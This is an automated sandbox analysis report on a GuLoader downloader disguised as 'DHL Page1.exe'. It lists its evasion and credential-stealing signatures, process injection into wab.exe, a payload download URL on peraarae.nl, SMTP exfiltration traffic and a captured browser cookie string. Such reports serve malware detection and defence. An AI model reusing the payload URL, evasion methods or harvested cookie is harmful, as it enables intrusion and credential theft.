Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Page1.exe

Overview

General Information

Sample name:DHL Page1.exe
Analysis ID:1501086
MD5:e563153089b05a25e30db0a73e196b10
SHA1:fb098be6dc900c18c83b53681cc0fd2c976fe638
SHA256:dbd76943d4c2efa432805b8458e970c2b6c6d76c16ff4d2a7d63df50ad0330af
Infos:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • DHL Page1.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\DHL Page1.exe" MD5: E563153089B05A25E30DB0A73E196B10)
    • wab.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\DHL Page1.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.127076986570.00000000377C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.123227921774.0000000007E0B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.253.62.108, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 2640, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49844
      Timestamp:2024-08-29T12:24:47.936144+0200
      SID:2803270
      Severity:2
      Source Port:49842
      Destination Port:80
      Protocol:TCP
      Classtype:Potentially Bad Traffic

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: DHL Page1.exeAvira: detected
      Source: DHL Page1.exeReversingLabs: Detection: 13%
      Source: DHL Page1.exeVirustotal: Detection: 13%Perma Link
      Source: DHL Page1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49843 version: TLS 1.2
      Source: DHL Page1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00406577 FindFirstFileW,FindClose,0_2_00406577
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00405A25 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A25
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49842 -> 104.153.208.178:80
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ViaMYxizkt11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: peraarae.nlCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ViaMYxizkt11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: peraarae.nlCache-Control: no-cache
      Source: wab.exe, 00000004.00000002.127076986570.0000000037BA9000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.00000000378E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/FALSE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
      Source: wab.exe, 00000004.00000002.127076986570.00000000378E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/FALSE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2"h equals www.linkedin.com (Linkedin)
      Source: wab.exe, 00000004.00000002.127078477032.0000000038789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: wab.exe, 00000004.00000002.127078477032.0000000038789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
      Source: global trafficDNS traffic detected: DNS query: peraarae.nl
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: smtp.gmail.com
      Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
      Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/wr2/75r4ZyA3vA0.crl0
      Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
      Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
      Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/wr2.crt0
      Source: DHL Page1.exe, 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Page1.exe, 00000000.00000000.121985944583.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/wr20%
      Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
      Source: wab.exe, 00000004.00000002.127066946181.0000000007A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://peraarae.nl/ViaMYxizkt11.bin
      Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
      Source: wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.gmail.com
      Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49843 version: TLS 1.2
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_004054D2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054D2
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_0040346C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040346C
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Windows\SysWOW64\Dogmefastes.lnkJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00406A4D0_2_00406A4D
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00404D0F0_2_00404D0F
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_004072240_2_00407224
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004741C84_2_004741C8
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0047A9784_2_0047A978
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0047DA304_2_0047DA30
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00474A984_2_00474A98
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00473E804_2_00473E80
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0047E7504_2_0047E750
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A5656984_2_3A565698
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A5677D04_2_3A5677D0
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A5600404_2_3A560040
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A563C604_2_3A563C60
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A56E1404_2_3A56E140
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A56D1F24_2_3A56D1F2
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A5696404_2_3A569640
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A5640224_2_3A564022
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_3A5600124_2_3A560012
      Source: DHL Page1.exeStatic PE information: invalid certificate
      Source: DHL Page1.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: DHL Page1.exe, 00000000.00000000.121986016582.000000000049C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeksposeets overklipning.exeDVarFileInfo$ vs DHL Page1.exe
      Source: DHL Page1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@3/12@3/3
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_0040346C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040346C
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00404793 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404793
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Program Files (x86)\eudaemons.iniJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoidesJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Users\user\AppData\Local\Temp\nsw38A0.tmpJump to behavior
      Source: DHL Page1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\DHL Page1.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: DHL Page1.exeReversingLabs: Detection: 13%
      Source: DHL Page1.exeVirustotal: Detection: 13%
      Source: C:\Users\user\Desktop\DHL Page1.exeFile read: C:\Users\user\Desktop\DHL Page1.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\DHL Page1.exe "C:\Users\user\Desktop\DHL Page1.exe"
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\DHL Page1.exe"
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\DHL Page1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: fontext.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: fms.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Milliluxes.lnk.0.drLNK file: ..\..\..\Windows\Fonts\vlgerne\construction.Bes231
      Source: Dogmefastes.lnk.0.drLNK file: ..\..\Users\user\AppData\Local\Temp\uddannelsesfiler\Maaneraket.uds
      Source: Milliluxes.lnk0.0.drLNK file: ..\..\..\Windows\Fonts\vlgerne\construction.Bes231
      Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
      Source: DHL Page1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.123227921774.0000000007E0B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00470C4F push ebx; retf 4_2_00470C52
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00470C6D push edi; retf 4_2_00470C7A
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00470CCB push edi; retf 4_2_00470C7A
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHL Page1.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
